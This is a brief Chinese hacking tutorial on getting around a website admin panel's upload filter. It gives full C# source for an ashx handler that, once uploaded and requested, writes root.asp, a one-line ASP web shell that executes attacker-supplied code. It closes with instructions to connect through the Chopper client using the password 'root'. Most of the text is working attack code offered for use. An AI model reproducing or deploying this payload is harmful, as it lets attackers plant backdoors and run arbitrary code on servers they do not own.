突破asa,cer,cdx,php,aspx

发现后台可以设置上传类型，但是asp，asa,cer等等都不行，上传之后就提示下载

尝试着关闭了下了，还是不行，后来找到了一位前辈写的文章

过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型，上传一个ashx脚本上去，

脚本内容如下：

<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}
}


然后访问上传后的ashx文件，就会在同目录下生成一个root.asp的一句话木马，然后使用一句话木马客户端连接即可。


密码为root，菜刀连之
                  ----------- by canlay